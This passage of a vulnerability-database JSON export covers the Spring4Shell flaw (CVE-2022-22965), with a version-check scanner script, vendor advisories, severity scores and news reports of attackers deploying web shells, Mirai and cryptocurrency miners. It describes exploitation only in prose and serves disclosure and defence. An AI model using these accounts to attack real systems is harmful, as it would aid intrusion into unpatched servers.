script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"mysql_enterprise_monitor_web_detect.nasl\", \"oracle_mysql_enterprise_monitor_local_nix_detect.nbin\", \"oracle_mysql_enterprise_monitor_local_detect.nbin\", \"macosx_mysql_enterprise_monitor_installed.nbin\");\n script_require_keys(\"installed_sw/MySQL Enterprise Monitor\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\n\nvar app_info = vcf::combined_get_app_info(app:'MySQL Enterprise Monitor');\n\nvar constraints = [\n { 'min_version' : '8.0', 'fixed_version' : '8.0.30' }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cisco": [{"lastseen": "2022-04-29T20:32:50", "description": "On March 31, 2022, the following critical vulnerability in the Spring Framework affecting Spring MVC and Spring WebFlux applications running on JDK 9+ was released:\n\n CVE-2022-22965: Spring Framework RCE via Data Binding on JDK 9+\n\nFor a description of this vulnerability, see VMware Spring Framework Security Vulnerability Report [\"https://tanzu.vmware.com/security/cve-2022-22965\"].\n\nThis advisory is available at the following link:\nhttps://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-java-spring-rce-Zx9GUc67 [\"https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-java-spring-rce-Zx9GUc67\"]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", 
"userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-01T23:45:00", "type": "cisco", "title": "Vulnerability in Spring Framework Affecting Cisco Products: March 2022", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-29T16:53:49", "id": "CISCO-SA-JAVA-SPRING-RCE-ZX9GUC67", "href": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-java-spring-rce-Zx9GUc67", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "trendmicroblog": [{"lastseen": "2022-04-08T19:28:48", "description": "We discovered active exploitation of a vulnerability in the Spring Framework designated as CVE-2022-22965 that allows malicious actors to download the Mirai botnet malware.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-08T00:00:00", "type": "trendmicroblog", "title": "CVE-2022-22965: Analyzing the Exploitation of Spring4Shell Vulnerability in Weaponizing and Executing the Mirai Botnet Malware", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, 
"userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-08T00:00:00", "id": "TRENDMICROBLOG:3BBEDAD3D1AE692D361A31D5E9AE2538", "href": "https://www.trendmicro.com/en_us/research/22/d/cve-2022-22965-analyzing-the-exploitation-of-spring4shell-vulner.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-20T15:36:25", "description": "Recently, we observed attempts to exploit the Spring4Shell vulnerability \u2014 a remote code execution bug, assigned as CVE-2022-22965 \u2014 by malicious actors to deploy cryptocurrency miners.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-20T00:00:00", "type": "trendmicroblog", "title": "Analyzing Attempts to Exploit the Spring4Shell Vulnerability CVE-2022-22965 to Deploy Cryptocurrency Miners", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": 
"NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-20T00:00:00", "id": "TRENDMICROBLOG:59C3D813302731E6DE220FB088280F67", "href": "https://www.trendmicro.com/en_us/research/22/d/spring4shell-exploited-to-deploy-cryptocurrency-miners.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-20T13:29:16", "description": "Recently, we observed the Spring4Shell vulnerability \u2014 a remote code execution bug, assigned as CVE-2022-22965 \u2014 being actively exploited by malicious actors to deploy cryptocurrency miners.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-20T00:00:00", "type": "trendmicroblog", "title": "Spring4Shell Vulnerability CVE-2022-22965 Exploited to Deploy Cryptocurrency Miners", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-20T00:00:00", "id": "TRENDMICROBLOG:AFF0912EF635E2446F0D546515038F73", "href": 
"https://www.trendmicro.com/en_us/research/22/d/spring4shell-exploited-to-deploy-cryptocurrency-miners.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "talosblog": [{"lastseen": "2022-04-08T19:36:04", "description": "UPDATE, APRIL 4, 2022: The Kenna Risk Score for CVE-2022-22965 is currently at maximum 100. This is an exceptionally rare score, of which only 415 out of 184,000 CVEs (or 0.22 percent) have achieved, reflecting the severity and potential effects of this vulnerability. To get a risk score this high... \n \n[[ This is only the beginning! Please visit the blog for the complete entry ]]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-04T10:26:10", "type": "talosblog", "title": "Threat Advisory: Spring4Shell", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-04T10:26:10", "id": "TALOSBLOG:3587BB077717B0512A9D0EFCCBE8770B", "href": "http://blog.talosintelligence.com/2022/03/threat-advisory-spring4shell.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "debiancve": [{"lastseen": "2022-04-08T19:36:00", 
"description": "A Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via data binding. The specific exploit requires the application to run on Tomcat as a WAR deployment. If the application is deployed as a Spring Boot executable jar, i.e. the default, it is not vulnerable to the exploit. However, the nature of the vulnerability is more general, and there may be other ways to exploit it.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-01T23:15:00", "type": "debiancve", "title": "CVE-2022-22965", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-01T23:15:00", "id": "DEBIANCVE:CVE-2022-22965", "href": "https://security-tracker.debian.org/tracker/CVE-2022-22965", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "thn": [{"lastseen": "2022-05-09T12:37:24", "description": 
"The maintainers of Spring Framework have released an emergency patch to address a newly disclosed [remote code execution flaw](<https://thehackernews.com/2022/03/unpatched-java-spring-framework-0-day.html>) that, if successfully exploited, could allow an unauthenticated attacker to take control of a targeted system.\n\nTracked as [CVE-2022-22965](<https://tanzu.vmware.com/security/cve-2022-22965>), the high-severity flaw impacts Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and other older, unsupported versions. Users are recommended to upgrade to versions 5.3.18 or later and 5.2.20 or later.\n\nThe Spring Framework is a Java framework that offers infrastructure support to develop web applications.\n\n\"The vulnerability impacts Spring [MVC](<https://en.wikipedia.org/wiki/Model%E2%80%93view%E2%80%93controller>) [model\u2013view\u2013controller] and Spring WebFlux applications running on [Java Development Kit] 9+,\" Rossen Stoyanchev of Spring.io [said](<https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement>) in an advisory published Thursday.\n\n\"The specific exploit requires the application to run on Tomcat as a WAR deployment. 
If the application is deployed as a Spring Boot executable jar, i.e., the default, it is not vulnerable to the exploit,\" Stoyanchev added.\n\n\"Exploitation requires an endpoint with DataBinder enabled (e.g., a POST request that decodes data from the request body automatically) and depends heavily on the servlet container for the application,\" Praetorian researchers Anthony Weems and Dallas Kaman [said](<https://www.praetorian.com/blog/spring-core-jdk9-rce/>).\n\nThat said, Spring.io warned that the \"nature of the vulnerability is more general\" and that there could be other ways to weaponize the flaw that have not come to light.\n\nThe patch arrives as a Chinese-speaking researcher briefly published a GitHub commit that contained proof-of-concept (PoC) exploit code for CVE-2022-22965 on March 30, 2022, before it was taken down.\n\nSpring.io, a subsidiary of VMware, noted that it was first alerted to the vulnerability \"late on Tuesday evening, close to midnight, GMT time by codeplutos, meizjm3i of AntGroup FG Security Lab.\" It also credited cybersecurity firm Praetorian for reporting the flaw.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-31T15:35:00", "type": "thn", "title": "Security Patch Releases for Critical Zero-Day Bug in Java Spring Framework", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-05T03:15:06", "id": "THN:7A3DFDA680FEA7FB77640D29F9D3E3E2", "href": "https://thehackernews.com/2022/03/security-patch-releases-for-critical.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:39:27", "description": "LemonDuck, a cross-platform cryptocurrency mining botnet, is targeting Docker to 
mine cryptocurrency on Linux systems as part of an active malware campaign.\n\n\"It runs an anonymous mining operation by the use of proxy pools, which hide the wallet addresses,\" CrowdStrike [said](<https://www.crowdstrike.com/blog/lemonduck-botnet-targets-docker-for-cryptomining-operations/>) in a new report. \"It evades detection by targeting Alibaba Cloud's monitoring service and disabling it.\"\n\nKnown to strike both Windows and Linux environments, LemonDuck is primarily engineered for abusing the system resources to mine Monero. But it's also capable of credential theft, lateral movement, and facilitating the deployment of additional payloads for follow-on activities.\n\n\"It uses a wide range of spreading mechanisms \u2014 phishing emails, exploits, USB devices, brute force, among others \u2014 and it has shown that it can quickly take advantage of news, events, or the release of new exploits to run effective campaigns,\" Microsoft [detailed](<https://thehackernews.com/2021/07/microsoft-warns-of-lemonduck-malware.html>) in a technical write-up of the malware last July. 
\n\nIn early 2021, attack chains involving LemonDuck [leveraged](<https://www.microsoft.com/security/blog/2021/03/25/analyzing-attacks-taking-advantage-of-the-exchange-server-vulnerabilities/>) the then newly patched [Exchange Server vulnerabilities](<https://thehackernews.com/2021/03/microsoft-exchange-cyber-attack-what-do.html>) to gain access to outdated Windows machines, before downloading backdoors and information stealers, including Ramnit.\n\nThe latest campaign spotted by CrowdStrike takes advantage of exposed Docker APIs as an initial access vector, using it to run a rogue container to retrieve a Bash shell script file that's disguised as a harmless PNG image file from a remote server.\n\nAn analysis of historical data shows that similar image file droppers hosted on LemonDuck-associated domains have been put to use by the threat actor since at least January 2021, the cybersecurity firm noted.\n\nThe dropper files are key to launching the attack, with the shell script downloading the actual payload that then kills competing processes, disables Alibaba Cloud's monitoring services, and finally downloads and runs the XMRig coin miner.\n\nWith [compromised cloud instances](<https://thehackernews.com/2021/11/hackers-using-compromised-google-cloud.html>) becoming a hotbed for illicit cryptocurrency mining activities, the findings underscore the need to secure containers from potential risks throughout the software supply chain.\n\n### TeamTNT targets AWS, Alibaba Cloud\n\nThe disclosure comes as Cisco Talos exposed the toolset of a cybercrime group named TeamTNT, which has a history of targeting cloud infrastructure for cryptojacking and placing 
backdoors.\n\nThe malware payloads, which are said to have been modified in response to [previous public disclosures](<https://www.trendmicro.com/en_us/research/21/c/teamtnt-continues-attack-on-the-cloud--targets-aws-credentials.html>), are primarily designed to target Amazon Web Services (AWS) while simultaneously focused on cryptocurrency mining, persistence, lateral movement, and disabling cloud security solutions.\n\n\"Cybercriminals who are outed by security researchers must update their tools in order to continue to operate successfully,\" Talos researcher Darin Smith [said](<https://blog.talosintelligence.com/2022/04/teamtnt-targeting-aws-alibaba.html>).\n\n\"The tools used by TeamTNT demonstrate that cybercriminals are increasingly comfortable attacking modern environments such as Docker, Kubernetes, and public cloud providers, which have traditionally been avoided by other cybercriminals who have instead focused on on-premise or mobile environments.\"\n\n### Spring4Shell exploited for cryptocurrency mining\n\nThat's not all. 
In yet another instance of how threat actors quickly co-opt newly disclosed flaws into their attacks, the critical remote code execution bug in Spring Framework ([CVE-2022-22965](<https://thehackernews.com/2022/04/hackers-exploiting-spring4shell.html>)) has been weaponized to deploy cryptocurrency miners.\n\nThe exploitation attempts make use of a custom web shell to deploy the cryptocurrency miners, but not before turning off the firewall and terminating other virtual currency miner processes.\n\n\"These cryptocurrency miners have the potential to affect a large number of users, especially since Spring is the most widely used framework for developing enterprise-level applications in Java,\" Trend Micro researchers Nitesh Surana and Ashish Verma [said](<https://www.trendmicro.com/en_us/research/22/d/spring4shell-exploited-to-deploy-cryptocurrency-miners.html>).\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-22T09:30:00", "type": "thn", "title": "Watch Out! 
Cryptocurrency Miners Targeting Dockers, AWS and Alibaba Cloud", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-22T09:30:49", "id": "THN:8FDA592D55831C1C4E3583B81FABA962", "href": "https://thehackernews.com/2022/04/watch-out-cryptocurrency-miners.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:39:29", "description": "The recently disclosed critical **Spring4Shell** vulnerability is being actively exploited by threat actors to execute the [Mirai](<https://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai>) [botnet malware](<https://blog.netlab.360.com/what-our-honeypot-sees-just-one-day-after-the-spring4shell-advisory-en/>), particularly in the Singapore region since the start of April 2022.\n\n\"The exploitation allows threat actors to download the Mirai sample to the '/tmp' folder and execute them after permission change using ['chmod](<https://en.wikipedia.org/wiki/Chmod>),'\" Trend Micro researchers Deep Patel, Nitesh Surana, and Ashish Verma [said](<https://www.trendmicro.com/en_us/research/22/d/cve-2022-22965-analyzing-the-exploitation-of-spring4shell-vulner.html>) in a report published 
Friday.\n\nTracked as [CVE-2022-22965](<https://thehackernews.com/2022/03/security-patch-releases-for-critical.html>) (CVSS score: 9.8), the vulnerability could allow malicious actors to achieve remote code execution in Spring Core applications under non-default circumstances, granting the attackers full control over the compromised devices.\n\nThe development comes as the U.S. Cybersecurity and Infrastructure Security Agency (CISA) earlier this week [added](<https://thehackernews.com/2022/04/cisa-warns-of-active-exploitation-of.html>) the Spring4Shell vulnerability to its Known Exploited Vulnerabilities Catalog based on \"evidence of active exploitation.\"\n\nThis is far from the first time the botnet operators have quickly moved to add newly publicized flaws to their exploit toolset. In December 2021, multiple botnets including Mirai and Kinsing were [uncovered](<https://www.zscaler.com/blogs/security-research/threatlabz-analysis-log4shell-cve-2021-44228-exploit-attempts>) leveraging the [Log4Shell vulnerability](<https://thehackernews.com/2022/04/chinese-hackers-target-vmware-horizon.html>) to breach susceptible servers on the internet. 
\n\n[Mirai](<https://en.wikipedia.org/wiki/Mirai_\\(malware\\)>), meaning \"future\" in Japanese, is the name given to a [Linux malware](<https://www.cloudflare.com/learning/ddos/glossary/mirai-botnet/>) that has continued to target connected smart home devices such as IP cameras and routers and link them together into a network of infected devices known as a botnet.\n\nThe IoT botnet, using the herd of hijacked hardware, can be then used to commit further attacks, including large-scale phishing attacks, cryptocurrency mining, click fraud, and distributed denial-of-service (DDoS) attacks.\n\nTo make matters worse, the leak of Mirai's source code in [October 2016](<https://thehackernews.com/2016/10/mirai-source-code-iot-botnet.html>) has given birth to [numerous variants](<https://thehackernews.com/2020/06/ddos-botnet-hacker-jailed.html>) such as Okiru, Satori, Masuta, and [Reaper](<https://www.radware.com/security/ddos-threats-attacks/threat-advisories-attack-reports/reaper-botnet/>), making it an ever-mutating threat.\n\n\"The [Mirai] code is so influential that even some of the malware offshoots are starting to have their own code versions released and co-opted by other cybercriminals,\" Intel 471 researchers [said](<https://intel471.com/blog/malware-source-code-leak-history>) last month, pointing out the upload of the [BotenaGo botnet's](<https://cybersecurity.att.com/blogs/labs-research/botenago-strike-again-malware-source-code-uploaded-to-github>) source code on GitHub in January 2022.\n\nEarlier this January, cybersecurity firm CrowdStrike noted that malware hitting Linux systems increased by 35% in 2021 compared to 2020, with [XOR DDoS](<https://thehackernews.com/2020/06/cryptocurrency-docker-image.html>), Mirai, and [Mozi](<https://thehackernews.com/2021/09/chinese-authorities-arrest-hackers.html>) malware families accounting for more than 22% of Linux-targeted threats observed in the year.\n\n\"The primary purpose of these malware families is to compromise 
vulnerable internet-connected devices, amass them into botnets, and use them to perform distributed denial-of-service (DDoS) attacks,\" the researchers [said](<https://www.crowdstrike.com/blog/linux-targeted-malware-increased-by-35-percent-in-2021/>).\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-04-09T05:18:00", "type": "thn", "title": "Hackers Exploiting Spring4Shell Vulnerability to Deploy Mirai Botnet Malware", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2022-22965"], "modified": "2022-04-14T04:20:56", "id": "THN:ECDABD8FB1E94F5D8AFD13E4C1CB5840", "href": "https://thehackernews.com/2022/04/hackers-exploiting-spring4shell.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:39:30", "description": 
"The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Monday added the recently disclosed remote code execution (RCE) vulnerability affecting the Spring Framework to its [Known Exploited Vulnerabilities Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) based on \"evidence of active exploitation.\"\n\nThe critical severity flaw, assigned the identifier [CVE-2022-22965](<https://thehackernews.com/2022/03/security-patch-releases-for-critical.html>) (CVSS score: 9.8) and dubbed \"Spring4Shell\", impacts Spring model\u2013view\u2013controller (MVC) and Spring WebFlux applications running on Java Development Kit 9 and later.\n\n\"Exploitation requires an endpoint with DataBinder enabled (e.g., a POST request that decodes data from the request body automatically) and depends heavily on the servlet container for the application,\" Praetorian researchers Anthony Weems and Dallas Kaman noted last week.\n\nAlthough exact details of in-the-wild abuse remain unclear, information security company SecurityScorecard [said](<https://securityscorecard.com/blog/spring4shell-12-year-old-vulnerability-springs-back-to-life>) \"active scanning for this vulnerability has been observed coming from the usual suspects like Russian and Chinese IP space.\"\n\nSimilar scanning activities have been spotted by [Akamai](<https://www.akamai.com/blog/security/spring-core-spring4shell-zero-day>) and Palo Alto Networks' [Unit42](<https://unit42.paloaltonetworks.com/cve-2022-22965-springshell/>), with the attempts leading to the deployment of a web shell for backdoor access and to execute arbitrary commands on the server with the goal of delivering other malware or spreading within the target 
network.\n\n\"During the first four days after the vulnerability outbreak, 16% of the organizations worldwide were impacted by exploitation attempts,\" Check Point Research [said](<https://blog.checkpoint.com/2022/04/05/16-of-organizations-worldwide-impacted-by-spring4shell-zero-day-vulnerability-exploitation-attempts-since-outbreak/>), adding it detected 37,000 Spring4Shell-related attacks over the weekend.\n\nMicrosoft 365 Defender Threat Intelligence Team also [chimed in](<https://www.microsoft.com/security/blog/2022/04/04/springshell-rce-vulnerability-guidance-for-protecting-against-and-detecting-cve-2022-22965/>), stating it has been \"tracking a low volume of exploit attempts across our cloud services for Spring Cloud and Spring Core vulnerabilities.\"\n\nAccording to [statistics](<https://www.sonatype.com/resources/springshell-exploit-resource-center>) released by Sonatype, potentially vulnerable versions of the Spring Framework account for 81% of the total downloads from Maven Central repository since the issue came to light on March 31.\n\nCisco, which is [actively investigating](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-java-spring-rce-Zx9GUc67>) its line-up to determine which of them may be impacted by the vulnerability, confirmed that three of its products are affected -\n\n * Cisco Crosswork Optimization Engine\n * Cisco Crosswork Zero Touch Provisioning (ZTP), and\n * Cisco Edge Intelligence\n\nVMware, for its part, also has deemed three of its products as vulnerable, offering patches and workarounds where applicable -\n\n * VMware Tanzu Application Service for VMs\n * VMware Tanzu Operations Manager, and\n * VMware Tanzu Kubernetes Grid Integrated Edition (TKGI)\n\n\"A malicious actor with network access to an impacted VMware product may exploit this issue to gain full control of the target system,\" VMware [said](<https://www.vmware.com/security/advisories/VMSA-2022-0010.html>) in the advisory.\n\nAlso added by 
CISA to the catalog are [two zero-day flaws](<https://thehackernews.com/2022/03/apple-issues-patches-for-2-actively.html>) patched by Apple last week (CVE-2022-22674 and CVE-2022-22675) and a critical shortcoming in D-Link routers (CVE-2021-45382) that has been actively weaponized by the [Beastmode](<https://thehackernews.com/2022/04/beastmode-ddos-botnet-exploiting-new.html>) Mirai-based DDoS campaign.\n\nPursuant to the Binding Operational Directive (BOD) [issued](<https://www.cisa.gov/binding-operational-directive-22-01>) by CISA in November 2021, Federal Civilian Executive Branch (FCEB) agencies are required to remediate the identified vulnerabilities by April 25, 2022.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-05T07:31:00", "type": "thn", "title": "CISA Warns of Active Exploitation of Critical Spring4Shell Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, 
